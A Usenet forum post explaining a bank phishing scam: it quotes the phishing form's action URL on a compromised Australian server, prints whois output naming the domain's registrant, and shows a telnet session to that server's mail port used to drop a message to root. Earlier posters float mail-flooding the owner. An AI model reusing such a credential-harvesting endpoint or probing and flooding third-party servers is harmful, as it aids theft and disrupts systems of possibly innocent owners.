Thread: Idle fun for net hackers..
View Single Post
  #8   Report Post  
Posted to uk.d-i-y
The Natural Philosopher[_2_] The Natural Philosopher[_2_] is offline
external usenet poster
  
Posts: 39,563
Default Idle fun for net hackers..
Tim Streater wrote:
In article
,
NT wrote:

On Feb 23, 3:01 pm, 82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote:

was poor Richard directly responsible or had his domain been
hacked by
miscreants?

If "poor Richard" has been hacked receipt of 1000 mails a second might
make him more careful with his system security in future.

More likely poor Richard doesnt have a clue what's going on, and will
simply have to abandon the email addy altogether.

The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

In which case if he
set that up, he should know better. If he didn't, and he's just a bot,
then 1000 mails a second should fill his disk up PDQ and the machine
will fall over.


Look it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - lets say -


One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out.

This form takes 99% of your own banks website, but with one crucial
difference, Instead of submitting the form to your bank, it submits it
to the phishing web server.. I didn't try doing that to see what would
happen.

eg in it is this line

form name="form1"
action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post"

At that point whatever you keyed in is now available to the phisher.

Anyway, I identified that server, and discovered it would accept emails.

#whois drabcdfirstaid.com.au
Domain Name: drabcdfirstaid.com.au
Last Modified: 30-Aug-2011 10:55:39 UTC
Registrar ID: NetRegistry
Registrar Name: NetRegistry
Status: ok

Registrant: LLOYD, RICHARD MILES
Eligibility Type: Sole Trader
Eligibility ID: ABN 35521483210
......

so

#telnet www.drabcdfirstaid.com.au 25
Trying 64.251.30.196...
Connected to drabcdfirstaid.com.au.
Escape character is '^]'.
220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me its a ubuntu machine running postfix mail. Now I know that if I
carry on with this telnet into the SMTP port, its very likely that
root@localhost will be accepted as a direct recipient into the root
users mailbox.

So I sent one. And it was.

The email came via an oregon ISP. From a completely different source
entirely.

Now its possible looking at the above that poor old richard doesn't know
he has a nasty file stuffed in a hidden directory (.image) on his web
server.

OTOH I did not do anything nasty. He knows he's been violated at one
level or another so if he doesn't get down and check his server out, and
see lots of unusual access, he's a first grade dope anyway.

Reply With QuoteReply With Quote